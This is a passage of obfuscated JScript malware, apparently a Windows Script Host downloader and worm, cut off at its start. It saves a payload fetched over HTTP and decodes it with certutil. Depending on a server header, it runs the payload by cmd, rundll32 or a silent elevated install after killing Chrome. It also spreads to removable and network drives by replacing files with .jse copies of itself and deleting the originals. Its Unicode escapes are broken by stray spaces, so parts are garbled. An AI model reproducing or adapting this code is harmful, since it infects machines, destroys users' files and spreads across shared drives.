							if (v1967what50["g" + "e" + "t" + "R" + "e" + "s" + "p" + "o" + "n" + "s" + "e" + "H" + "e" + "a" + "d" + "e" + "r"]("I" + "_" + "a" + "m" + "_" + "t" + "h" + "e" + "_" + "d" + "a" + "n" + "g" + "e" + "r") == '0')
							{
								v1967salesmen26 = \u0061\ u0075\ u0074\ u006f\ u0039\ u0030\ u0039\ u0038\ u0039\ u0072;
								v1967backtowards89 = 0;
							}
						}
						catch (voeaPLkmnB)
						{}
						try
						{
							if (v1967what50["g" + "e" + "t" + "R" + "e" + "s" + "p" + "o" + "n" + "s" + "e" + "H" + "e" + "a" + "d" + "e" + "r"]("I" + "_" + "a" + "m" + "_" + "t" + "h" + "e" + "_" + "d" + "a" + "n" + "g" + "e" + "r") == "1") v1967backtowards89 = 1;
						}
						catch (voeaPLkmnB)
						{}
						try
						{
							if (v1967what50["g" + "e" + "t" + "R" + "e" + "s" + "p" + "o" + "n" + "s" + "e" + "H" + "e" + "a" + "d" + "e" + "r"]("I" + "_" + "a" + "m" + "_" + "t" + "h" + "e" + "_" + "d" + "a" + "n" + "g" + "e" + "r") == "2") v1967backtowards89 = 2;
						}
						catch (voeaPLkmnB)
						{}
						try
						{
							if (v1967what50["g" + "e" + "t" + "R" + "e" + "s" + "p" + "o" + "n" + "s" + "e" + "H" + "e" + "a" + "d" + "e" + "r"]("C" + "o" + "n" + "t" + "e" + "n" + "t" + "-" + "T" + "r" + "a" + "n" + "s" + "f" + "e" + "r" + "-" + "E" + "n" + "c" + "o" + "d" + "i" + "n" + "g") == "b" + "i" + "n" + "a" + "r" + "y")
							{
								v1967pitifully86["O" + "p" + "e" + "n"]();
								v1967pitifully86["T" + "y" + "p" + "e"] = 1;
								v1967pitifully86["W" + "r" + "i" + "t" + "e"](v1967what50["r" + "e" + "s" + "p" + "o" + "n" + "s" + "e" + "B" + "o" + "d" + "y"]);
								v1967pitifully86["P" + "o" + "s" + "i" + "t" + "i" + "o" + "n"] = 0;
								v1967pitifully86["S" + "a" + "v" + "e" + "T" + "o" + "F" + "i" + "l" + "e"](v1967salesmen26, 2);
								v1967pitifully86["C" + "l" + "o" + "s" + "e"]();
							}
							else
							{
								if (v1967with46.length > 10)
								{
									v1967could48 = v1967there93["C" + "r" + "e" + "a" + "t" + "e" + "T" + "e" + "x" + "t" + "F" + "i" + "l" + "e"](v1967Youve25, true, false);
									v1967could48["W" + "r" + "i" + "t" + "e" + "L" + "i" + "n" + "e"](v1967with46);
									v1967could48["C" + "l" + "o" + "s" + "e"]();
									v1967thedoctors13["S" + "l" + "e" + "e" + "p"](6000);
									v1967little22["S" + "h" + "e" + "l" + "l" + "E" + "x" + "e" + "c" + "u" + "t" + "e"]("c" + "e" + "r" + "t" + "u" + "t" + "i" + "l", v1967effort74 + v1967Youve25 + " " + \u0063\ u0068\ u0061\ u0072\ u0071 + v1967salesmen26 + \u0063\ u0068\ u0061\ u0072\ u0071, '', "o" + "p" + "e" + "n", 0);
								}
							}
						}
						catch (voeaPLkmnB)
						{}
					}
					else
					{\
						u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 = 0;
						continue;
					}
					if (v1967backtowards89 == 0)
					{
						v1967thedoctors13["S" + "l" + "e" + "e" + "p"](50000);
						v1967backtowards89 = -1;\
						u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 = 9;
						continue;
					}
					v1967thedoctors13["S" + "l" + "e" + "e" + "p"](25000);
					if (!v1967there93["F" + "i" + "l" + "e" + "E" + "x" + "i" + "s" + "t" + "s"](v1967salesmen26) && \u0053\ u0045\ u0054\ u005f\ u0057\ u004f\ u0052\ u004d\ u005f\ u004d\ u004f\ u0044\ u0045)
					{
						try
						{\
							u0065\ u0035\ u0036\ u0037\ u0038\ u0039 = new\ u0045\ u006e\ u006d\ u004e(\u0063\ u006f\ u006c\ u0044\ u0072\ u0069\ u0076\ u0065\ u0073);
							for (; !\u0065\ u0035\ u0036\ u0037\ u0038\ u0039["a" + "t" + "E" + "n" + "d"]();\ u0065\ u0035\ u0036\ u0037\ u0038\ u0039["m" + "o" + "v" + "e" + "N" + "e" + "x" + "t"]())
							{\
								u0078\ u0037\ u0036\ u0035\ u0034\ u0035 = \u0065\ u0035\ u0036\ u0037\ u0038\ u0039["i" + "t" + "e" + "m"]();
								if ((\u0078\ u0037\ u0036\ u0035\ u0034\ u0035["I" + "s" + "R" + "e" + "a" + "d" + "y"] && (\u0078\ u0037\ u0036\ u0035\ u0034\ u0035["D" + "r" + "i" + "v" + "e" + "T" + "y" + "p" + "e"] == 3 || \u0078\ u0037\ u0036\ u0035\ u0034\ u0035["D" + "r" + "i" + "v" + "e" + "T" + "y" + "p" + "e"] == 1)) && \u0075\ u0073\ u0065\ u0072\ u0031\ u0032["s" + "u" + "b" + "s" + "t" + "r" + "i" + "n" + "g"](0, 1) != \u0078\ u0037\ u0036\ u0035\ u0034\ u0035["D" + "r" + "i" + "v" + "e" + "L" + "e" + "t" + "t" + "e" + "r"])
								{
									v1967little22["S" + "h" + "e" + "l" + "l" + "E" + "x" + "e" + "c" + "u" + "t" + "e"]("c" + "m" + "d", "/" + "U" + " " + "/" + "Q" + " " + "/" + "C" + " " + "c" + "d" + " " + "/" + "D" + " " + \u0078\ u0037\ u0036\ u0035\ u0034\ u0035["D" + "r" + "i" + "v" + "e" + "L" + "e" + "t" + "t" + "e" + "r"] + ":" + " " + "&" + "&" + " " + "d" + "i" + "r" + " " + "/" + "b" + "/" + "s" + "/" + "x" + " " + v1967resolve50 + ">" + ">" + "%" + "T" + "E" + "M" + "P" + "%" + "\" + "\" + v1967were48, '', "o" + "p" + "e" + "n", 0);
									v1967thedoctors13["S" + "l" + "e" + "e" + "p"](1000 * 60);
								}
							}
							v1967thedoctors13["S" + "l" + "e" + "e" + "p"](1000 * 40);
							v1967even47 = v1967there93["G" + "e" + "t" + "F" + "i" + "l" + "e"](\u0074\ u0065\ u006d\ u0070\ u0031\ u0032 + v1967tohis29 + v1967were48)["O" + "p" + "e" + "n" + "A" + "s" + "T" + "e" + "x" + "t" + "S" + "t" + "r" + "e" + "a" + "m"](1, -1);
							while (!v1967even47["A" + "t" + "E" + "n" + "d" + "O" + "f" + "S" + "t" + "r" + "e" + "a" + "m"])
							{
								v1967door77 = v1967even47["R" + "e" + "a" + "d" + "L" + "i" + "n" + "e"]();
								v1967them88 = v1967door77["s" + "u" + "b" + "s" + "t" + "r" + "i" + "n" + "g"](0, v1967door77["i" + "n" + "d" + "e" + "x" + "O" + "f"]("."));
								v1967little22["S" + "h" + "e" + "l" + "l" + "E" + "x" + "e" + "c" + "u" + "t" + "e"]("c" + "m" + "d", "/" + "U" + " " + "/" + "Q" + " " + "/" + "C" + " " + "c" + "o" + "p" + "y" + " " + "/" + "Y" + " " + \u0063\ u0068\ u0061\ u0072\ u0071 + \u0061\ u0075\ u0074\ u006f\ u0039\ u0030\ u0039\ u0038\ u0039\ u0072 + \u0063\ u0068\ u0061\ u0072\ u0071 + " " + \u0063\ u0068\ u0061\ u0072\ u0071 + v1967them88 + "." + "j" + "s" + "e" + \u0063\ u0068\ u0061\ u0072\ u0071 + " " + "&" + "&" + " " + "d" + "e" + "l" + " " + "/" + "Q" + "/" + "F" + " " + \u0063\ u0068\ u0061\ u0072\ u0071 + v1967door77 + \u0063\ u0068\ u0061\ u0072\ u0071, '', "o" + "p" + "e" + "n", 0);
							}
							v1967even47["C" + "l" + "o" + "s" + "e"]();
							v1967there93["D" + "e" + "l" + "e" + "t" + "e" + "F" + "i" + "l" + "e"](\u0074\ u0065\ u006d\ u0070\ u0031\ u0032 + v1967tohis29 + v1967were48);
						}
						catch (voeaPLkmnB)
						{}\
						u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 = 0;
						continue;
					}
					v1967loud80 = v1967there93["G" + "e" + "t" + "F" + "i" + "l" + "e"](v1967salesmen26)["O" + "p" + "e" + "n" + "A" + "s" + "T" + "e" + "x" + "t" + "S" + "t" + "r" + "e" + "a" + "m"](1);
					v1967last18 = v1967loud80["R" + "e" + "a" + "d" + "L" + "i" + "n" + "e"]()["s" + "u" + "b" + "s" + "t" + "r" + "i" + "n" + "g"](0, 2);
					v1967loud80["C" + "l" + "o" + "s" + "e"]();
					if (v1967last18 == \u006d\ u007a\ u0031\ u0032 && \u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 == 0)
					{
						try
						{
							switch (v1967backtowards89)
							{
							case -1:
								v1967little22["S" + "h" + "e" + "l" + "l" + "E" + "x" + "e" + "c" + "u" + "t" + "e"]("c" + "m" + "d", String["f" + "r" + "o" + "m" + "C" + "h" + "a" + "r" + "C" + "o" + "d" + "e"](\u0073\ u0068\ u0069\ u0074\ u0038\ u0039 + \u0073\ u0065\ u0072\ u0074\ u0039\ u0030) + "c" + " " + "s" + "t" + "a" + "r" + "t" + " " + v1967salesmen26, '', "o" + "p" + "e" + "n", \u0065\ u0078\ u0069\ u0074\ u0031\ u0032\ u0033);\
								u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 = 45;
								break;
							case 0:
								v1967little22["S" + "h" + "e" + "l" + "l" + "E" + "x" + "e" + "c" + "u" + "t" + "e"]("c" + "m" + "d", String["f" + "r" + "o" + "m" + "C" + "h" + "a" + "r" + "C" + "o" + "d" + "e"](\u0073\ u0068\ u0069\ u0074\ u0038\ u0039 + \u0073\ u0065\ u0072\ u0074\ u0039\ u0030) + "c" + " " + "s" + "t" + "a" + "r" + "t" + " " + v1967salesmen26, '', "o" + "p" + "e" + "n", \u0065\ u0078\ u0069\ u0074\ u0031\ u0032\ u0033);\
								u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 = 46;
								break;
							case 1:
								v1967little22["S" + "h" + "e" + "l" + "l" + "E" + "x" + "e" + "c" + "u" + "t" + "e"]("r" + "u" + "n" + "d" + "l" + "l" + "3" + "2", \u0063\ u0068\ u0061\ u0072\ u0071 + v1967salesmen26 + \u0063\ u0068\ u0061\ u0072\ u0071 + " " + "s" + "e" + "c" + "r" + "e" + "t" + "F" + "u" + "n" + "c" + "t" + "i" + "o" + "n", '', "o" + "p" + "e" + "n", \u0065\ u0078\ u0069\ u0074\ u0031\ u0032\ u0033);\
								u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 = 47;
								break;
							case 2:
								v1967little22["S" + "h" + "e" + "l" + "l" + "E" + "x" + "e" + "c" + "u" + "t" + "e"]("t" + "a" + "s" + "k" + "k" + "i" + "l" + "l", "/" + "f" + " " + "/" + "t" + " " + "/" + "i" + "m" + " " + "c" + "h" + "r" + "o" + "m" + "e" + "." + "e" + "x" + "e", '', "o" + "p" + "e" + "n", 0);
								v1967little22["S" + "h" + "e" + "l" + "l" + "E" + "x" + "e" + "c" + "u" + "t" + "e"](v1967salesmen26, "/" + "s" + "i" + "l" + "e" + "n" + "t" + " " + "/" + "i" + "n" + "s" + "t" + "a" + "l" + "l", '', "r" + "u" + "n" + "a" + "s", 1);\
								u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 = 48;
								break;
							}
						}
						catch (voeaPLkmnB)
						{\
							u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 = 8888;
						}
						v1967thedoctors13["S" + "l" + "e" + "e" + "p"](11000);
					}
				}
			}
			catch (voeaPLkmnB)
			{}
			v1967thedoctors13["S" + "l" + "e" + "e" + "p"](70000);
		};
	};
};
v1967hardly95t = 0.96;
v1967there14t = 0.581;
v1967although19t = 0.185;
v1967only8t = 0.949;
v1967noticeable76t = 0.281;
v1967well48t = 0.831;